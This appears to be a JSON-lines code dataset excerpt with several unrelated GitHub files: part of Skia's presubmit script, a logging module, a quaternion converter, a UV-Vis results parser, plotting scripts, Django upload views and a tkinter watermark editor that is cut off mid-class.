cr.GetReviewers():\n if reviewer in PUBLIC_API_OWNERS:\n # If an owner is specified as an reviewer in Gerrit then ignore the\n # public api owners check.\n return results\n else:\n match = re.search(r'^TBR=(.*)$', cr.GetDescription(), re.M)\n if match:\n tbr_section = match.group(1).strip().split(' ')[0]\n tbr_entries = tbr_section.split(',')\n for owner in PUBLIC_API_OWNERS:\n if owner in tbr_entries or owner.split('@')[0] in tbr_entries:\n # If an owner is specified in the TBR= line then ignore the public\n # api owners check.\n return results\n\n if cr.GetOwnerEmail() in PUBLIC_API_OWNERS:\n # An owner created the CL that is an automatic LGTM.\n lgtm_from_owner = True\n\n for approver in cr.GetApprovers():\n if approver in PUBLIC_API_OWNERS:\n # Found an lgtm in a message from an owner.\n lgtm_from_owner = True\n break\n\n if not lgtm_from_owner:\n results.append(\n output_api.PresubmitError(\n \"If this CL adds to or changes Skia's public API, you need an LGTM \"\n \"from any of %s. If this CL only removes from or doesn't change \"\n \"Skia's public API, please add a short note to the CL saying so. \"\n \"Add one of the owners as a reviewer to your CL as well as to the \"\n \"TBR= line. If you don't know if this CL affects Skia's public \"\n \"API, treat it like it does.\" % str(PUBLIC_API_OWNERS)))\n return results\n\n\ndef _FooterExists(footers, key, value):\n for k, v in footers:\n if k == key and v == value:\n return True\n return False\n\n\ndef PostUploadHook(cl, change, output_api):\n \"\"\"git cl upload will call this hook after the issue is created/modified.\n\n This hook does the following:\n * Adds a link to preview docs changes if there are any docs changes in the CL.\n * Adds 'No-Try: true' if the CL contains only docs changes.\n * Adds 'No-Tree-Checks: true' for non master branch changes since they do not\n need to be gated on the master branch's tree.\n * Adds 'No-Try: true' for non master branch changes since trybots do not yet\n work on them.\n * Adds 'No-Presubmit: true' for non master branch changes since those don't\n run the presubmit checks.\n * Adds extra trybots for the paths defined in PATH_TO_EXTRA_TRYBOTS.\n \"\"\"\n\n results = []\n atleast_one_docs_change = False\n all_docs_changes = True\n for affected_file in change.AffectedFiles():\n affected_file_path = affected_file.LocalPath()\n file_path, _ = os.path.splitext(affected_file_path)\n if 'site' == file_path.split(os.path.sep)[0]:\n atleast_one_docs_change = True\n else:\n all_docs_changes = False\n if atleast_one_docs_change and not all_docs_changes:\n break\n\n issue = cl.issue\n if issue:\n # Skip PostUploadHooks for all auto-commit service account bots. New\n # patchsets (caused due to PostUploadHooks) invalidates the CQ+2 vote from\n # the \"--use-commit-queue\" flag to \"git cl upload\".\n for suffix in SERVICE_ACCOUNT_SUFFIX:\n if cl.GetIssueOwner().endswith(suffix):\n return results\n\n original_description_lines, footers = cl.GetDescriptionFooters()\n new_description_lines = list(original_description_lines)\n\n # If the change includes only doc changes then add No-Try: true in the\n # CL's description if it does not exist yet.\n if all_docs_changes and not _FooterExists(footers, 'No-Try', 'true'):\n new_description_lines.append('No-Try: true')\n results.append(\n output_api.PresubmitNotifyResult(\n 'This change has only doc changes. Automatically added '\n '\\'No-Try: true\\' to the CL\\'s description'))\n\n # If there is atleast one docs change then add preview link in the CL's\n # description if it does not already exist there.\n docs_preview_link = '%s%s' % (DOCS_PREVIEW_URL, issue)\n docs_preview_line = 'Docs-Preview: %s' % docs_preview_link\n if (atleast_one_docs_change and\n not _FooterExists(footers, 'Docs-Preview', docs_preview_link)):\n # Automatically add a link to where the docs can be previewed.\n new_description_lines.append(docs_preview_line)\n results.append(\n output_api.PresubmitNotifyResult(\n 'Automatically added a link to preview the docs changes to the '\n 'CL\\'s description'))\n\n # If the target ref is not master then add 'No-Tree-Checks: true' and\n # 'No-Try: true' to the CL's description if it does not already exist there.\n target_ref = cl.GetRemoteBranch()[1]\n if target_ref != 'refs/remotes/origin/master':\n if not _FooterExists(footers, 'No-Tree-Checks', 'true'):\n new_description_lines.append('No-Tree-Checks: true')\n results.append(\n output_api.PresubmitNotifyResult(\n 'Branch changes do not need to rely on the master branch\\'s '\n 'tree status. Automatically added \\'No-Tree-Checks: true\\' to '\n 'the CL\\'s description'))\n if not _FooterExists(footers, 'No-Try', 'true'):\n new_description_lines.append('No-Try: true')\n results.append(\n output_api.PresubmitNotifyResult(\n 'Trybots do not yet work for non-master branches. '\n 'Automatically added \\'No-Try: true\\' to the CL\\'s '\n 'description'))\n if not _FooterExists(footers, 'No-Presubmit', 'true'):\n new_description_lines.append('No-Presubmit: true')\n results.append(\n output_api.PresubmitNotifyResult(\n 'Branch changes do not run the presubmit checks.'))\n\n # Automatically set Cq-Include-Trybots if any of the changed files here\n # begin with the paths of interest.\n bots_to_include = []\n for affected_file in change.AffectedFiles():\n affected_file_path = affected_file.LocalPath()\n for path_prefix, extra_bots in PATH_PREFIX_TO_EXTRA_TRYBOTS.iteritems():\n if affected_file_path.startswith(path_prefix):\n results.append(\n output_api.PresubmitNotifyResult(\n 'Your CL modifies the path %s.\\nAutomatically adding %s to '\n 'the CL description.' % (affected_file_path, extra_bots)))\n bots_to_include.append(extra_bots)\n if bots_to_include:\n output_api.EnsureCQIncludeTrybotsAreAdded(\n cl, bots_to_include, new_description_lines)\n\n # If the description has changed update it.\n if new_description_lines != original_description_lines:\n # Add a new line separating the new contents from the old contents.\n new_description_lines.insert(len(original_description_lines), '')\n cl.UpdateDescriptionFooters(new_description_lines, footers)\n\n return results\n\n\ndef CheckChangeOnCommit(input_api, output_api):\n \"\"\"Presubmit checks for the change on commit.\n\n The following are the presubmit checks:\n * Check change has one and only one EOL.\n * Ensures that the Skia tree is open in\n http://skia-tree-status.appspot.com/. Shows a warning if it is in 'Caution'\n state and an error if it is in 'Closed' state.\n \"\"\"\n results = []\n results.extend(_CommonChecks(input_api, output_api))\n results.extend(\n _CheckTreeStatus(input_api, output_api, json_url=(\n SKIA_TREE_STATUS_URL + '/banner-status?format=json')))\n results.extend(_CheckLGTMsForPublicAPI(input_api, output_api))\n results.extend(_CheckOwnerIsInAuthorsFile(input_api, output_api))\n # Checks for the presence of 'DO NOT''SUBMIT' in CL description and in\n # content of files.\n results.extend(\n input_api.canned_checks.CheckDoNotSubmit(input_api, output_api))\n return results\n","repo_name":"kiwibrowser/src","sub_path":"third_party/skia/PRESUBMIT.py","file_name":"PRESUBMIT.py","file_ext":"py","file_size_in_byte":22455,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"26714636079","text":"# -*- coding: utf-8 -*-\n\nimport collections\nimport logging\nfrom os import getlogin\nfrom platform import node as comp_name\n\nAPP_TYPE_MANAGED = 'managed'\nAPP_TYPE_ORDINARY = 'ordinary'\n\nFORM_MANAGED = 'FormManaged'\nFORM_ORDINARY = 'FormOrdinary'\nCOMMON_MODULE = 'CommonModule'\nDATA_PROCESSOR = 'DataProcessor'\n\nMoveConfiguration = collections.namedtuple('MoveConfiguration', ['primary_form_config', 'secondary_forms_config'])\n\nPrimaryModuleConfiguration = collections.namedtuple('PrimaryModuleConfiguration',\n ['functions_to_move',\n 'export_functions',\n 'dp_module_chain'])\n\nSecondaryFormsConfiguration = collections.namedtuple('SecondaryFormsConfiguration',\n ['functions_to_move_dict',\n 'replace_calls_to_primary_module',\n 'wrapper_calls',\n 'export_functions'])\n\nBuildParams = collections.namedtuple('ProcessingParams', ['object_name',\n 'main_managed_form',\n 'managed_forms',\n 'ordinary_forms'])\n\n__ENV_DESC = {'user': getlogin(), 'comp': comp_name()}\n__LOGGER = logging.getLogger('epfcomp')\n\ndef __init_logging():\n formatter = logging.Formatter('%(asctime)s %(comp)s(%(user)s)- %(levelname)s: %(message)s')\n # Вывод данных логирования в консоль\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter)\n __LOGGER.addHandler(ch)\n __LOGGER.setLevel(logging.INFO)\n\ndef log(msg, *args):\n __LOGGER.info(msg, *args, extra=__ENV_DESC)\n\n__init_logging()\n\nif __name__ == '__main__':\n log('Пример сообщения логирования')\n","repo_name":"musiy/asmbl","sub_path":"base_const.py","file_name":"base_const.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19380087370","text":"# function that converts the quaterions in the state to euler angles\n\nimport numpy as np\n\ndef quat2euler(quaternion):\n\tq0 = quaternion[0,0]\n\tq1 = quaternion[1,0]\n\tq2 = quaternion[2,0]\n\tq3 = quaternion[3,0]\n\n\ta = np.arctan( (2 * (q0*q1 + q2*q3)) / (1 - 2*(q1*q1 + q2*q2) ) )\t\n\tb = np.arcsin(2 * (q0*q2 - q3*q1) )\n\tc = np.arctan( (2 * (q0*q3 + q1*q2)) / (1 - 2*(q2*q2 + q3*q3) ) )\t\n\ttemp = 180/np.pi\n\teuler = np.transpose(np.array([[temp * a,temp * b,temp * c]]))\n\n\treturn euler\n","repo_name":"Robert108/SSY226_VRU_repo","sub_path":"PythonDev/quat2euler.py","file_name":"quat2euler.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13468285310","text":"#!/usr/bin/env python3\n\n\"\"\"\nFile: uv_vis.py\nAuthor: Tom Mason\nEmail: tommason14@gmail.com\nGithub: https:github.com/tommason14\nDescription: This pulls UV-Vis data from Orca and Gaussian\nlog files. Note that this script does not account for fluorescence,\nbut only because of the NA given for the root. This can easily be \nchanged.\n\"\"\"\n\nfrom autochem import GaussianResults, OrcaResults, get_log_type\nfrom glob import glob\nfrom tqdm import tqdm\nimport sys\n\n\ndef results_filename():\n if len(sys.argv) > 2:\n sys.exit(\"Syntax: uv_vis.py \")\n if len(sys.argv) == 2:\n return sys.argv[1]\n return \"uv_vis.csv\"\n\n\ndef results(logfile):\n \"\"\"\n Returns the results class of Orca and Gaussian log files.\n If log is of a different type, returns None.\n \"\"\"\n _types = {\"gaussian\": GaussianResults, \"orca\": OrcaResults}\n\n for key, val in _types.items():\n if get_log_type(logfile) is key:\n return val(logfile)\n\n\ndef check_for_prog(lst):\n \"\"\"\n Decides if a progress bar is necessary or not\n \"\"\"\n if len(lst) > 5:\n return tqdm(lst)\n return lst\n\n\ndef write_results(filename):\n with open(filename, \"w\") as f:\n f.write(\n \"Config,\" \"Root,\" \"Iteration,\" \"Transition Energies (eV),\" \"Wavelength (nm),\" \"Intensity (au)\\n\"\n )\n for logfile in check_for_prog(glob(\"**/*log\", recursive=True)):\n log = results(logfile)\n if log is None:\n continue # if not gaussian/orca job\n for iteration, data in enumerate(\n zip(log.td_dft_wavelengths, log.td_dft_intensities, log.td_dft_transition_energies,), 1,\n ):\n waves, ints, energies = data\n for wave, intensity, energy in zip(waves, ints, energies):\n f.write(f\"{logfile},NA,{iteration},{energy},{wave},{intensity}\\n\")\n\n\ndef main():\n filename = results_filename()\n write_results(filename)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tommason14/scripts","sub_path":"chem/uv_vis.py","file_name":"uv_vis.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"27305179849","text":"import matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nimport seaborn as sns\r\nimport numpy as np\r\n\r\n# Data for plotting\r\nt = np.arange(0.0, 2.0, 0.01)\r\ns = 1 + np.sin(2 * np.pi * t)\r\n\r\ncolors=sns.color_palette(\"rocket\",3)\r\nmpl.rcParams['font.family'] = 'Avenir'\r\nmpl.rcParams['font.size']=12\r\n\r\n\r\nfig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex=True, sharey=True, figsize=(8,8))\r\n\r\nax1.plot(t, s, color=colors[0])\r\n\r\n\r\n#fig.set_title('simple plot')\r\nax3.set(xlabel='time(s)', ylabel='voltage (mv)',\r\n title='$n=1$')\r\n\r\nplt.minorticks_on()\r\n\r\nfor ax in (ax1, ax2, ax3, ax4):\r\n ax.tick_params(direction='in',which='minor', length=5, bottom=True, top=True, left=True, right=True)\r\n ax.tick_params(direction='in',which='major', length=10, bottom=True, top=True, left=True, right=True)\r\n ax.set_xlim(-5, 5)\r\n ax.set_ylim(-5, 5)\r\n\r\nplt.show()","repo_name":"Sntz91/dqn_multistep_experiments","sub_path":"visualizations/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12121880955","text":"from django.shortcuts import redirect, render,HttpResponse\nfrom django import forms\nimport os\nfrom django.conf import settings\n\nfrom app.utils.bootstrap import BootStrapForm,BootStrapModelForm\nfrom app import models\n\n# 文件组件 UpFrom\nclass UpForm(BootStrapForm):\n bootstrap_exclude_fields = [\"img\"] # 排除img字段 form-control 格式\n name = forms.CharField(label=\"姓名\")\n age = forms.CharField(label=\"年龄\")\n img = forms.FileField(label=\"头像\")\n\n# 文件上传(UpForm)\ndef upload_form(request):\n title = \"上传组件 UpFrom\"\n if request.method == \"GET\":\n form = UpForm()\n return render(request,'file/upload_form.html',{\"form\": form, \"title\": title})\n form = UpForm(data=request.POST, files=request.FILES)\n if form.is_valid():\n img_object = form.cleaned_data.get(\"img\")\n media_path = os.path.join(\"media\",img_object.name)\n f = open(media_path,mode='wb')\n for chunk in img_object.chunks():\n f.write(chunk)\n f.close()\n models.Employee.objects.create(\n name = form.cleaned_data[\"name\"],\n age = form.cleaned_data[\"age\"],\n img = media_path\n )\n return HttpResponse(\"...\")\n return render(request,'file/upload_form.html',{\"form\": form, \"title\": title})\n\n# 文件组件 ModelForm\nclass UpModelForm(BootStrapModelForm):\n bootstrap_exclude_fields = ['img','photo']\n class Meta:\n model = models.Employee\n fields = \"__all__\"\n\n# 文件上传 (ModalForm)\ndef upload_modelform(request):\n title = \"上传组件 UpModelForm\"\n if request.method == \"GET\":\n form = UpModelForm()\n return render(request,'file/upload_modelform.html',{\"form\":form, \"title\": title})\n form = UpModelForm(data=request.POST, files=request.FILES)\n if form.is_valid():\n form.save()\n return redirect(\"/file/upload/employee/\")\n return render(request, 'file/upload_employee.html', {\"form\": form, \"title\":title})\n\n# Employee 上传文件列表\ndef upload_employee(request):\n queryset = models.Employee.objects.all()\n\n return render(request,'file/upload_employee.html',{\"queryset\": queryset})\n\n\n# 文件上传\ndef upload_list(request):\n if request.method == \"GET\":\n return render(request,'file/upload_list.html')\n \n file_object = request.FILES.get(\"avatar\")\n # print(file_object.name) # 文件名\n\n # 写入文件\n f = open(file_object.name,mode='wb')\n for chunk in file_object.chunks():\n f.write(chunk)\n f.close\n\n return HttpResponse(\"...\")\n\n","repo_name":"houxiaoqiu/django","sub_path":"djsite/app/views/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2610113667","text":"import argparse\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nimport pdb\nimport os\n\nimport utils\n\ndef get_argparser():\n\t\n\tparser = argparse.ArgumentParser()\n\n\t### CNNs\n\tparser.add_argument(\"--units\", \n\t\tdefault=16,\n\t\ttype=int,\n\t\thelp=\"Number of units in hidden layers of the DNN\")\n\tparser.add_argument(\"--layers\", \n\t\tdefault=2,\n\t\ttype=int,\n\t\thelp=\"Number of layers in the DNN\")\n\tparser.add_argument(\"--reg\", \n\t\tdefault=0.1,\n\t\ttype=float,\n\t\thelp=\"Regularization weight of the DNN\")\n\n\tparser.add_argument(\"--data_type\", \n\t\tdefault='rgb',\n\t\ttype=str,\n\t\thelp=\"Which data to evaluate on: (ir, rgb, cover)\")\n\n\treturn parser\n\ndef mixed_inputs():\n\n\tmodel_names = ['mixedinput', 'mixedlayer']\n\tplot_obj = np.zeros((2, 2))\n\tplot_i = 0\n\n\tfor model_name in model_names:\n\n\t\tloss_obj = np.loadtxt(f'output-data/train-history-{model_name}.csv', delimiter=',')\n\n\t\tprint(f'For model {model_name} Best train accuracy is {np.max(loss_obj[2])}')\n\t\tprint(f'For model {model_name} Best val accuracy is {np.max(loss_obj[3])}')\n\n\t\tplot_obj[plot_i, 0] = np.max(loss_obj[2])\n\t\tplot_obj[plot_i, 1] = np.max(loss_obj[3])\n\n\t\tplot_i += 1\n\n\tfig, ax = plt.subplots(1, 1, figsize=(6, 5))\n\n\twidth = 0.25\n\n\tax.set_title(f'Combined CNN Performance', fontsize=24)\n\tax.set_ylim([0, 1.05])\n\tax.bar(np.arange(2) - width / 2, plot_obj[:, 0], width, label='Training')\n\tax.bar(np.arange(2) + width / 2, plot_obj[:, 1], width, label='Validation')\n\n\tax.set_axisbelow(True)\n\tax.set_yticks(np.arange(0, 1.05, 0.1))\n\tax.grid(True, which='major', axis='y', linestyle = '--')\n\tax.legend(loc='best', fontsize=20)\n\n\tax.set_xticks(np.arange(2))\n\tax.set_xticklabels(['Mixed-input', 'Mixed-layer'], fontsize=16)\n\tax.set_ylabel('Accuracy', fontsize=20)\n\n\tfig.tight_layout(rect=[0, 0, 1, 1])\n\n\tplt.savefig(f'plot-combined.pdf')\n\ndef final_cdf():\n\n\trf_val_proba = np.load(f'RF7-valproba-simple.npy')\n\trf_test_proba = np.load(f'RF7-testproba-simple.npy')\n\trf_val = np.load(f'RF7-yval-simple.npy')\n\trf_test = np.load(f'RF7-ytest-simple.npy')\n\n\tcnn_val_proba = np.load(f'CNN10-valproba-rgb.npy')\n\tcnn_test_proba = np.load(f'CNN10-testproba-rgb.npy')\n\tcnn_val_cat = np.load(f'CNN10-yval-rgb.npy')\n\tcnn_test_cat = np.load(f'CNN10-ytest-rgb.npy')\n\tcnn_val = np.argmax(cnn_val_cat, axis=1)\n\tcnn_test = np.argmax(cnn_test_cat, axis=1)\n\n\trf_val_ranks = np.zeros(len(rf_val_proba))\n\tcnn_val_ranks = np.zeros(len(cnn_val_proba))\n\trf_test_ranks = np.zeros(len(rf_test_proba))\n\tcnn_test_ranks = np.zeros(len(cnn_test_proba))\n\n\tfor i in range(len(rf_val_proba)):\n\t\trf_val_ranks[i] = utils.scores_to_rank(rf_val_proba[i], rf_val[i])\n\t\tcnn_val_ranks[i] = utils.scores_to_rank(cnn_val_proba[i], cnn_val[i])\n\n\tfor i in range(len(rf_test_proba)):\n\t\trf_test_ranks[i] = utils.scores_to_rank(rf_test_proba[i], rf_test[i])\n\t\tcnn_test_ranks[i] = utils.scores_to_rank(cnn_test_proba[i], cnn_test[i])\n\n\tn_classes = 10\n\tcdf_val_rf = utils.plot_cdf(rf_val_ranks, max_rank=n_classes)\n\tcdf_val_cnn = utils.plot_cdf(cnn_val_ranks, max_rank=n_classes)\n\n\tcdf_test_rf = utils.plot_cdf(rf_test_ranks, max_rank=n_classes)\n\tcdf_test_cnn = utils.plot_cdf(cnn_test_ranks, max_rank=n_classes)\n\n\tfig, ax = plt.subplots(1, 1, figsize=(8, 6))\n\n\tax.plot(np.arange(1, n_classes + 1), cdf_test_rf, lw=2, label='Random Forest')\n\tax.plot(np.arange(1, n_classes + 1), cdf_test_cnn, lw=2, label='CNN')\n\tax.plot(np.arange(1, n_classes+1), np.arange(1, n_classes+1) / n_classes, color='black', linestyle='--', lw=2, label='Baseline')\n\n\tax.set_xticks(np.arange(n_classes + 1))\n\tax.legend(fontsize=20)\n\n\tax.set_ylim([0, 1.05])\n\tax.set_yticks(np.arange(0, 1.05, 0.1))\n\tax.set_axisbelow(True)\n\tax.grid(True, which='major', axis='y', linestyle = '--')\n\n\tax.set_ylabel('Top-K accuracy', fontsize=20)\n\tax.set_xlabel('K (number of output classes)', fontsize=20)\n\n\tfig.tight_layout()\n\tplt.savefig(f'final_cdf.pdf')\n\tplt.close()\n\n\tprint('RF')\n\tprint(cdf_test_rf)\n\t\n\tprint('CNN10')\n\tprint(cdf_test_cnn)\n\n\treturn\n\nif __name__ == '__main__':\n\t\n\tparser = get_argparser()\n\targs = parser.parse_args()\n\n\tfinal_cdf()\n","repo_name":"clementfung/biodiversity-analyzer","sub_path":"plot_combined.py","file_name":"plot_combined.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30854694025","text":"from tkinter import Button, Image, END\nimport tkinter as tk\nimport ttkbootstrap\nfrom ttkbootstrap.constants import *\nimport PIL\nfrom PIL import ImageTk, Image, ImageDraw, ImageFont\nimport os\nimport pandas as pd\nimport re\n\nCOLORS_FP = \"assets/colors/rgb_colors.csv\"\ndf = pd.read_csv(COLORS_FP)\nCOLOR_LIST = df['hex'].values.tolist()\nALL_COLOR = df.to_dict('records')\n\nFONT_FAMILIES = [\n {'font_name': 'Arial', 'path': 'assets/fonts/Arial.ttf'},\n {'font_name': 'Degreco', 'path': 'assets/fonts/degreco-condensed-regular.otf'},\n {'font_name': 'Eagle Lake', 'path': 'assets/fonts/EagleLake-Regular.ttf'},\n {'font_name': 'IBM Plex Mono', 'path': 'assets/fonts/IBMPlexMono-Regular.ttf'},\n {'font_name': 'Jacques Francois', 'path': 'assets/fonts/JacquesFrancois-Regular.ttf'},\n {'font_name': 'Quando', 'path': 'assets/fonts/Quando-Regular.ttf'},\n {'font_name': 'Racing Sans One', 'path': 'assets/fonts/RacingSansOne-Regular.ttf'},\n {'font_name': 'Sacramento', 'path': 'assets/fonts/Sacramento-Regular.ttf'},\n {'font_name': 'Sail', 'path': 'assets/fonts/Sail-Regular.ttf'},\n {'font_name': 'Trade Winds', 'path': 'assets/fonts/TradeWinds-Regular.ttf'},\n {'font_name': 'Verdana', 'path': 'assets/fonts/verdana.ttf'},\n {'font_name': 'ZCOOL KuaiLe', 'path': 'assets/fonts/ZCOOLKuaiLe-Regular.ttf'},\n ]\nOPEN_COLSE_BTN_IMG = [\n 'assets/icons/up-arrow.png',\n 'assets/icons/right-arrow.png'\n ]\nPOSITIONS = ['Top Center', 'Top Left', 'Top Right', 'Middle Center', 'Middle Left', 'Middle right', 'Bottom Center', 'Bottom Left', 'Bottom Right']\n\n\nclass AddTextMenu(ttkbootstrap.Frame):\n def __init__(self, win, watermark, photo_box):\n self.watermark = watermark \n self.photo_box = photo_box\n \n super().__init__(win)\n self.sub_win = ttkbootstrap.Toplevel() \n self.sub_win.title('Properties')\n self.sub_win.geometry(f'420x700+1000+140')\n\n self.text_entry = TextEntry(self.sub_win, self.on_text_change)\n self.text_entry.grid(row=2, column=0, padx=15, pady=(15,5), sticky=NSEW)\n\n self.font_widget = FontWidget(self.sub_win, self.on_font_change)\n self.font_widget.grid(row=3, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.color_widget = ColorWidget4(self.sub_win, self.on_color_change)\n self.color_widget.grid(row=4, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.size_widget = SizeWidget(self.sub_win, self.on_size_change)\n self.size_widget.grid(row=5, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.opacity_widget = OpacityWidget(self.sub_win, self.on_opacity_change)\n self.opacity_widget.grid(row=6, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.position_widget = PositionWidget(self.sub_win, self.watermark, self.on_position_set, self.on_position_change)\n self.position_widget.grid(row=7, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.rotation_widget = RotationWidget2(self.sub_win, self.on_rotation_change)\n self.rotation_widget.grid(row=8, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.copy_save_widget = ClearSaveWidget(self.sub_win, self.clear, self.save)\n self.copy_save_widget.grid(row=9, column=0, padx=15, pady=(35,15))\n\n def on_text_change(self, sv):\n self.watermark.text = sv.get()\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def on_font_change(self, font):\n self.font_widget.show_font_effect.configure(image=font['photo'])\n self.font_widget.show_font_name.configure(text=font['font_name'])\n self.watermark.change_font(font)\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n self.font_widget.toggle_open_close()\n\n def on_color_change(self, color):\n self.color_widget.show_color_hex.configure(text=color, background=color)\n self.watermark.change_color(color)\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n self.color_widget.toggle_open_close()\n\n def on_size_change(self, event):\n self.watermark.change_size(event, self.size_widget.selected_size.get())\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def on_opacity_change(self, event):\n self.watermark.change_opacity(event, self.opacity_widget.slider.get())\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def on_position_set(self):\n selected_pos = self.position_widget.var_radio.get()\n self.watermark.selected_pos = selected_pos\n watermark_xy = self.watermark.get_position(self.photo_box.im_width, self.photo_box.im_height, self.photo_box.text_w, self.photo_box.text_h)\n self.watermark.x = watermark_xy[0]\n self.watermark.y = watermark_xy[1]\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def on_position_change(self, direction):\n print(self.watermark.x, self.watermark.y)\n new_xy = self.watermark.move(direction)\n self.watermark.x = new_xy[0]\n self.watermark.y = new_xy[1]\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def on_rotation_change(self, event, var_scale): # Scale version\n self.watermark.rotate(event, var_scale)\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def clear(self):\n self.photo_box.remove()\n self.text_entry.sv.set(self.watermark.text)\n self.text_entry.ent.focus()\n self.opacity_widget.slider.set(self.watermark.opacity)\n self.on_font_change([font for font in FONT_FAMILIES if font['font_name']==self.watermark.font['font_name']][0])\n self.font_widget.toggle_open_close()\n self.on_color_change(self.watermark.color)\n self.color_widget.toggle_open_close()\n self.size_widget.selected_size.set(self.watermark.font_size)\n self.rotation_widget.slider.set(self.watermark.rotation)\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def save(self):\n self.photo_box.save()\n\n# ==============================================================\nclass TextEntry(ttkbootstrap.Frame):\n def __init__(self, win, on_text_change):\n super().__init__(win)\n ttkbootstrap.Label(self, text='Text:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n self.sv = ttkbootstrap.StringVar()\n self.sv.set('Your Text')\n self.sv.trace('w', lambda name, index, mode, sv=self.sv: on_text_change(sv))\n self.ent = ttkbootstrap.Entry(self, textvariable=self.sv, width=32)\n self.ent.focus()\n self.ent.grid(row=0, column=1)\n\nclass FontWidget(ttkbootstrap.Frame):\n def __init__(self, win, on_font_change, **kwargs):\n super().__init__(win, **kwargs)\n self.columnconfigure(0, weight=1)\n self.cumulative_rows = 0\n\n self.base_frm = ttkbootstrap.Frame(self) \n self.base_frm.grid(row=0, column=0, sticky=NSEW)\n \n self.up_arrow_img = ttkbootstrap.PhotoImage(file=OPEN_COLSE_BTN_IMG[0])\n self.right_arrow_img = ttkbootstrap.PhotoImage(file=OPEN_COLSE_BTN_IMG[1])\n\n ttkbootstrap.Label(self.base_frm, text='Font: ', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n frm = ttkbootstrap.Frame(self.base_frm, width=26)\n frm.grid(row=0, column=1, sticky=EW)\n self.show_font_effect = ttkbootstrap.Label(frm, text='') \n self.show_font_effect.grid(row=0, column=0)\n self.show_font_name = ttkbootstrap.Label(frm, text='', width=23, anchor=CENTER) \n self.show_font_name.grid(row=0, column=1, padx=(1,2))\n self.btn = Button(frm, text='', image=self.right_arrow_img, width=20, command=self.toggle_open_close) \n self.btn.grid(row=0, column=2, sticky=E)\n\n self.canvas = ttkbootstrap.Canvas(self.base_frm, highlightthickness=0) \n self.scrollbar = ttkbootstrap.Scrollbar(self.base_frm, orient=tk.VERTICAL, command=self.canvas.yview) \n self.canvas.configure(yscrollcommand=self.scrollbar.set)\n\n self.font_families = FONT_FAMILIES\n \n self.style = ttkbootstrap.Style()\n self.font_group = ttkbootstrap.Frame(self, padding=(20,5,0,0))\n self.font_group.bind('', lambda e:self.canvas.configure(scrollregion=self.canvas.bbox('all')))\n self.canvas.create_window((0,0), window=self.font_group, anchor=NW)\n\n for num, font in enumerate(self.font_families):\n width, height = (60, 60)\n text_1 = 'Ag'\n d_font_1 = ImageFont.truetype(font['path'], size=26)\n d_fill = (77, 77, 77)\n\n font_txt = Image.new('RGB', (width, height), (256, 256, 256))\n d = ImageDraw.Draw(font_txt)\n _, _, w, h = d.textbbox((0, 0), text=text_1, font=d_font_1) \n d.text(xy=((width-w)/2, (height-h)/2), text=text_1, font=d_font_1, fill=d_fill) \n \n font_photo = ImageTk.PhotoImage(font_txt)\n font['photo'] = font_photo \n font_btn = Button(self.font_group, image=font_photo, command=lambda font=font: on_font_change(font)) \n font_btn.grid(row=int(num/5)+1, column=num%5, padx=1, pady=1, sticky=W) \n\n self.show_font_effect.configure(image=self.font_families[0]['photo'])\n self.show_font_name.configure(text=self.font_families[0]['font_name'])\n \n def toggle_open_close(self):\n if self.font_group.winfo_viewable():\n self.canvas.grid_remove()\n self.scrollbar.grid_remove()\n self.btn.configure(image=self.right_arrow_img)\n else:\n self.canvas.grid(row=1, column=0, columnspan=4, padx=0, sticky=EW) \n self.scrollbar.grid(row=1, column=3, padx=0, sticky=NS+W) \n self.btn.configure(image=self.up_arrow_img)\n \n\n# class ColorWidget1(ttkbootstrap.Frame): # Combobox version\n# def __init__(self, win, on_color_change):\n# super().__init__(win)\n# self.color_list = [\"black\", \"white\", \"blue\", \"yellow\", \"green\", \"red\", \"purple\", \"orange\", \"brown\"]\n# self.selected_color = ttkbootstrap.StringVar()\n# self.selected_color.set(self.color_list[0])\n# ttkbootstrap.Label(self, text='Color:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n# self.cob = ttkbootstrap.Combobox(self, textvariable=self.selected_color, values=self.color_list, state='readonly', width=20)\n# self.cob.current(0)\n# self.cob.bind('<>', on_color_change)\n# self.cob.grid(row=0, column=1)\n\n# def get_value(self):\n# return self.cob.get()\n# class ColorWidget2(ttkbootstrap.Frame): # Listbox version:https://www.plus2net.com/python/tkinter-colors.php\n# def 